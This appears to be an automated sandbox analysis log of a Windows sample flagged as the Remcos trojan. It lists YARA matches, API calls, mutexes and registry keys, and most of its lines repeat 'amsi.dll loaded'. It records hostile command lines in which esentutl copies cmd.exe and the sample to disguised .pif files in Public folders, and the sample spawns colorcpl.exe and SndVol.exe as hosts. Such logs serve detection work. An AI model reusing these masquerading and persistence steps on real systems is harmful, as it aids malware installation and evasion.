                    Source: Process Memory Space: colorcpl.exe PID: 2684, type: MEMORYSTRMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                    Source: Process Memory Space: SndVol.exe PID: 1520, type: MEMORYSTRMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                    Source: Process Memory Space: SndVol.exe PID: 1200, type: MEMORYSTRMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                    Source: classification engineClassification label: mal100.rans.troj.spyw.expl.evad.winEXE@18/10@3/3
                    Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_02FA798D GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,GetLastError,7_2_02FA798D
                    Source: C:\Windows\SysWOW64\SndVol.exeCode function: 10_2_0289798D GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,GetLastError,10_2_0289798D
                    Source: C:\Windows\SysWOW64\SndVol.exeCode function: 12_2_0301798D GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,GetLastError,12_2_0301798D
                    Source: C:\Users\user\Desktop\XjPA2pnUhC.exeCode function: 0_2_028F7FD4 GetDiskFreeSpaceA,0_2_028F7FD4
                    Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_02F9F4AF GetModuleFileNameW,CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,CloseHandle,CloseHandle,7_2_02F9F4AF
                    Source: C:\Users\user\Desktop\XjPA2pnUhC.exeCode function: 0_2_02906DC8 CoCreateInstance,0_2_02906DC8
                    Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_02FAB539 FindResourceA,LoadResource,LockResource,SizeofResource,7_2_02FAB539
                    Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_02FAAADB OpenSCManagerW,OpenServiceW,CloseServiceHandle,StartServiceW,CloseServiceHandle,CloseServiceHandle,CloseServiceHandle,7_2_02FAAADB
                    Source: C:\Users\user\Desktop\XjPA2pnUhC.exeFile created: C:\Users\Public\Libraries\PNOJump to behavior
                    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5268:120:WilError_03
                    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2472:120:WilError_03
                    Source: C:\Windows\SysWOW64\colorcpl.exeMutant created: \Sessions\1\BaseNamedObjects\Rmc-OGO4HJ
                    Source: C:\Users\user\Desktop\XjPA2pnUhC.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
                    Source: C:\Users\user\Desktop\XjPA2pnUhC.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
                    Source: C:\Users\Public\Libraries\Qzzgbhha.PIFKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
                    Source: C:\Users\Public\Libraries\Qzzgbhha.PIFKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
                    Source: C:\Users\Public\Libraries\Qzzgbhha.PIFKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
                    Source: C:\Users\Public\Libraries\Qzzgbhha.PIFKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
                    Source: C:\Users\user\Desktop\XjPA2pnUhC.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                    Source: XjPA2pnUhC.exeReversingLabs: Detection: 31%
                    Source: C:\Users\user\Desktop\XjPA2pnUhC.exeFile read: C:\Users\user\Desktop\XjPA2pnUhC.exeJump to behavior
                    Source: unknownProcess created: C:\Users\user\Desktop\XjPA2pnUhC.exe "C:\Users\user\Desktop\XjPA2pnUhC.exe"
                    Source: C:\Users\user\Desktop\XjPA2pnUhC.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\Public\Libraries\ahhbgzzQ.cmd" "
                    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\esentutl.exe C:\\Windows\\System32\\esentutl /y C:\\Windows\\System32\\cmd.exe /d C:\\Users\\Public\\alpha.pif /o
                    Source: C:\Users\user\Desktop\XjPA2pnUhC.exeProcess created: C:\Windows\SysWOW64\esentutl.exe C:\\Windows\\System32\\esentutl.exe /y C:\Users\user\Desktop\XjPA2pnUhC.exe /d C:\\Users\\Public\\Libraries\\Qzzgbhha.PIF /o
                    Source: C:\Windows\SysWOW64\esentutl.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Source: C:\Users\user\Desktop\XjPA2pnUhC.exeProcess created: C:\Windows\SysWOW64\colorcpl.exe C:\Windows\System32\colorcpl.exe
                    Source: unknownProcess created: C:\Users\Public\Libraries\Qzzgbhha.PIF "C:\Users\Public\Libraries\Qzzgbhha.PIF"
                    Source: C:\Users\Public\Libraries\Qzzgbhha.PIFProcess created: C:\Windows\SysWOW64\SndVol.exe C:\Windows\System32\SndVol.exe
                    Source: C:\Users\user\Desktop\XjPA2pnUhC.exeProcess created: C:\Users\Public\Libraries\Qzzgbhha.PIF "C:\Users\Public\Libraries\Qzzgbhha.PIF"
                    Source: C:\Users\Public\Libraries\Qzzgbhha.PIFProcess created: C:\Windows\SysWOW64\SndVol.exe C:\Windows\System32\SndVol.exe
                    Source: C:\Users\user\Desktop\XjPA2pnUhC.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\Public\Libraries\ahhbgzzQ.cmd" "Jump to behavior
                    Source: C:\Users\user\Desktop\XjPA2pnUhC.exeProcess created: C:\Windows\SysWOW64\esentutl.exe C:\\Windows\\System32\\esentutl.exe /y C:\Users\user\Desktop\XjPA2pnUhC.exe /d C:\\Users\\Public\\Libraries\\Qzzgbhha.PIF /oJump to behavior
                    Source: C:\Users\user\Desktop\XjPA2pnUhC.exeProcess created: C:\Windows\SysWOW64\colorcpl.exe C:\Windows\System32\colorcpl.exeJump to behavior
                    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\esentutl.exe C:\\Windows\\System32\\esentutl /y C:\\Windows\\System32\\cmd.exe /d C:\\Users\\Public\\alpha.pif /oJump to behavior
                    Source: C:\Users\Public\Libraries\Qzzgbhha.PIFProcess created: C:\Windows\SysWOW64\SndVol.exe C:\Windows\System32\SndVol.exeJump to behavior
                    Source: C:\Users\Public\Libraries\Qzzgbhha.PIFProcess created: C:\Windows\SysWOW64\SndVol.exe C:\Windows\System32\SndVol.exeJump to behavior
                    Source: C:\Users\user\Desktop\XjPA2pnUhC.exeSection loaded: apphelp.dllJump to behavior
                    Source: C:\Users\user\Desktop\XjPA2pnUhC.exeSection loaded: version.dllJump to behavior
                    Source: C:\Users\user\Desktop\XjPA2pnUhC.exeSection loaded: uxtheme.dllJump to behavior
                    Source: C:\Users\user\Desktop\XjPA2pnUhC.exeSection loaded: olepro32.dllJump to behavior
                    Source: C:\Users\user\Desktop\XjPA2pnUhC.exeSection loaded: url.dllJump to behavior
                    Source: C:\Users\user\Desktop\XjPA2pnUhC.exeSection loaded: ieframe.dllJump to behavior
                    Source: C:\Users\user\Desktop\XjPA2pnUhC.exeSection loaded: iertutil.dllJump to behavior
                    Source: C:\Users\user\Desktop\XjPA2pnUhC.exeSection loaded: netapi32.dllJump to behavior
                    Source: C:\Users\user\Desktop\XjPA2pnUhC.exeSection loaded: userenv.dllJump to behavior
                    Source: C:\Users\user\Desktop\XjPA2pnUhC.exeSection loaded: winhttp.dllJump to behavior
                    Source: C:\Users\user\Desktop\XjPA2pnUhC.exeSection loaded: wkscli.dllJump to behavior
                    Source: C:\Users\user\Desktop\XjPA2pnUhC.exeSection loaded: netutils.dllJump to behavior
                    Source: C:\Users\user\Desktop\XjPA2pnUhC.exeSection loaded: windows.storage.dllJump to behavior
                    Source: C:\Users\user\Desktop\XjPA2pnUhC.exeSection loaded: wldp.dllJump to behavior
                    Source: C:\Users\user\Desktop\XjPA2pnUhC.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Users\user\Desktop\XjPA2pnUhC.exeSection loaded: propsys.dllJump to behavior
                    Source: C:\Users\user\Desktop\XjPA2pnUhC.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\Desktop\XjPA2pnUhC.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\Desktop\XjPA2pnUhC.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\Desktop\XjPA2pnUhC.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\Desktop\XjPA2pnUhC.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\Desktop\XjPA2pnUhC.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\Desktop\XjPA2pnUhC.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\Desktop\XjPA2pnUhC.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\Desktop\XjPA2pnUhC.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\Desktop\XjPA2pnUhC.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\Desktop\XjPA2pnUhC.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\Desktop\XjPA2pnUhC.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\Desktop\XjPA2pnUhC.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\Desktop\XjPA2pnUhC.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\Desktop\XjPA2pnUhC.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\Desktop\XjPA2pnUhC.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\Desktop\XjPA2pnUhC.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\Desktop\XjPA2pnUhC.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\Desktop\XjPA2pnUhC.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\Desktop\XjPA2pnUhC.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\Desktop\XjPA2pnUhC.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\Desktop\XjPA2pnUhC.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\Desktop\XjPA2pnUhC.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\Desktop\XjPA2pnUhC.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\Desktop\XjPA2pnUhC.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\Desktop\XjPA2pnUhC.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\Desktop\XjPA2pnUhC.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\Desktop\XjPA2pnUhC.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\Desktop\XjPA2pnUhC.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\Desktop\XjPA2pnUhC.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\Desktop\XjPA2pnUhC.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\Desktop\XjPA2pnUhC.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\Desktop\XjPA2pnUhC.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\Desktop\XjPA2pnUhC.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\Desktop\XjPA2pnUhC.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\Desktop\XjPA2pnUhC.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\Desktop\XjPA2pnUhC.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\Desktop\XjPA2pnUhC.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\Desktop\XjPA2pnUhC.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\Desktop\XjPA2pnUhC.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\Desktop\XjPA2pnUhC.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\Desktop\XjPA2pnUhC.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\Desktop\XjPA2pnUhC.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\Desktop\XjPA2pnUhC.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\Desktop\XjPA2pnUhC.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\Desktop\XjPA2pnUhC.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\Desktop\XjPA2pnUhC.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\Desktop\XjPA2pnUhC.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\Desktop\XjPA2pnUhC.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\Desktop\XjPA2pnUhC.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\Desktop\XjPA2pnUhC.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\Desktop\XjPA2pnUhC.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\Desktop\XjPA2pnUhC.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\Desktop\XjPA2pnUhC.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\Desktop\XjPA2pnUhC.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\Desktop\XjPA2pnUhC.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\Desktop\XjPA2pnUhC.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\Desktop\XjPA2pnUhC.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\Desktop\XjPA2pnUhC.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\Desktop\XjPA2pnUhC.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\Desktop\XjPA2pnUhC.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\Desktop\XjPA2pnUhC.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\Desktop\XjPA2pnUhC.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\Desktop\XjPA2pnUhC.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\Desktop\XjPA2pnUhC.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\Desktop\XjPA2pnUhC.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\Desktop\XjPA2pnUhC.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\Desktop\XjPA2pnUhC.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\Desktop\XjPA2pnUhC.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\Desktop\XjPA2pnUhC.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\Desktop\XjPA2pnUhC.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\Desktop\XjPA2pnUhC.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\Desktop\XjPA2pnUhC.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\Desktop\XjPA2pnUhC.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\Desktop\XjPA2pnUhC.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\Desktop\XjPA2pnUhC.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\Desktop\XjPA2pnUhC.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\Desktop\XjPA2pnUhC.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\Desktop\XjPA2pnUhC.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\Desktop\XjPA2pnUhC.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\Desktop\XjPA2pnUhC.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\Desktop\XjPA2pnUhC.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\Desktop\XjPA2pnUhC.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\Desktop\XjPA2pnUhC.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\Desktop\XjPA2pnUhC.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\Desktop\XjPA2pnUhC.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\Desktop\XjPA2pnUhC.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\Desktop\XjPA2pnUhC.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\Desktop\XjPA2pnUhC.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\Desktop\XjPA2pnUhC.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\Desktop\XjPA2pnUhC.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\Desktop\XjPA2pnUhC.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\Desktop\XjPA2pnUhC.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\Desktop\XjPA2pnUhC.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\Desktop\XjPA2pnUhC.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\Desktop\XjPA2pnUhC.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\Desktop\XjPA2pnUhC.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\Desktop\XjPA2pnUhC.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\Desktop\XjPA2pnUhC.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\Desktop\XjPA2pnUhC.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\Desktop\XjPA2pnUhC.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\Desktop\XjPA2pnUhC.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\Desktop\XjPA2pnUhC.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\Desktop\XjPA2pnUhC.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\Desktop\XjPA2pnUhC.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\Desktop\XjPA2pnUhC.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\Desktop\XjPA2pnUhC.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\Desktop\XjPA2pnUhC.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\Desktop\XjPA2pnUhC.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\Desktop\XjPA2pnUhC.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\Desktop\XjPA2pnUhC.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\Desktop\XjPA2pnUhC.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\Desktop\XjPA2pnUhC.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\Desktop\XjPA2pnUhC.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\Desktop\XjPA2pnUhC.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\Desktop\XjPA2pnUhC.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\Desktop\XjPA2pnUhC.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\Desktop\XjPA2pnUhC.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\Desktop\XjPA2pnUhC.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\Desktop\XjPA2pnUhC.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\Desktop\XjPA2pnUhC.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\Desktop\XjPA2pnUhC.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\Desktop\XjPA2pnUhC.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\Desktop\XjPA2pnUhC.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\Desktop\XjPA2pnUhC.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\Desktop\XjPA2pnUhC.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\Desktop\XjPA2pnUhC.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\Desktop\XjPA2pnUhC.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\Desktop\XjPA2pnUhC.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\Desktop\XjPA2pnUhC.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\Desktop\XjPA2pnUhC.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\Desktop\XjPA2pnUhC.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\Desktop\XjPA2pnUhC.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\Desktop\XjPA2pnUhC.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\Desktop\XjPA2pnUhC.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\Desktop\XjPA2pnUhC.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\Desktop\XjPA2pnUhC.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\Desktop\XjPA2pnUhC.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\Desktop\XjPA2pnUhC.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\Desktop\XjPA2pnUhC.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\Desktop\XjPA2pnUhC.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\Desktop\XjPA2pnUhC.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\Desktop\XjPA2pnUhC.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\Desktop\XjPA2pnUhC.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\Desktop\XjPA2pnUhC.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\Desktop\XjPA2pnUhC.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\Desktop\XjPA2pnUhC.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\Desktop\XjPA2pnUhC.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\Desktop\XjPA2pnUhC.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\Desktop\XjPA2pnUhC.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\Desktop\XjPA2pnUhC.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\Desktop\XjPA2pnUhC.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\Desktop\XjPA2pnUhC.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\Desktop\XjPA2pnUhC.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\Desktop\XjPA2pnUhC.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\Desktop\XjPA2pnUhC.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\Desktop\XjPA2pnUhC.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\Desktop\XjPA2pnUhC.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\Desktop\XjPA2pnUhC.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\Desktop\XjPA2pnUhC.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\Desktop\XjPA2pnUhC.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\Desktop\XjPA2pnUhC.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\Desktop\XjPA2pnUhC.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\Desktop\XjPA2pnUhC.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\Desktop\XjPA2pnUhC.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\Desktop\XjPA2pnUhC.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\Desktop\XjPA2pnUhC.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\Desktop\XjPA2pnUhC.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\Desktop\XjPA2pnUhC.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\Desktop\XjPA2pnUhC.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\Desktop\XjPA2pnUhC.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\Desktop\XjPA2pnUhC.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\Desktop\XjPA2pnUhC.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\Desktop\XjPA2pnUhC.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\Desktop\XjPA2pnUhC.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\Desktop\XjPA2pnUhC.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\Desktop\XjPA2pnUhC.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\Desktop\XjPA2pnUhC.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\Desktop\XjPA2pnUhC.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\Desktop\XjPA2pnUhC.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\Desktop\XjPA2pnUhC.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\Desktop\XjPA2pnUhC.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\Desktop\XjPA2pnUhC.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\Desktop\XjPA2pnUhC.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\Desktop\XjPA2pnUhC.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\Desktop\XjPA2pnUhC.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\Desktop\XjPA2pnUhC.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\Desktop\XjPA2pnUhC.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\Desktop\XjPA2pnUhC.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\Desktop\XjPA2pnUhC.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\Desktop\XjPA2pnUhC.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\Desktop\XjPA2pnUhC.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\Desktop\XjPA2pnUhC.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\Desktop\XjPA2pnUhC.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\Desktop\XjPA2pnUhC.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\Desktop\XjPA2pnUhC.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\Desktop\XjPA2pnUhC.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\Desktop\XjPA2pnUhC.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\Desktop\XjPA2pnUhC.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\Desktop\XjPA2pnUhC.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\Desktop\XjPA2pnUhC.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\Desktop\XjPA2pnUhC.exeSection loaded: amsi.dllJump to behavior
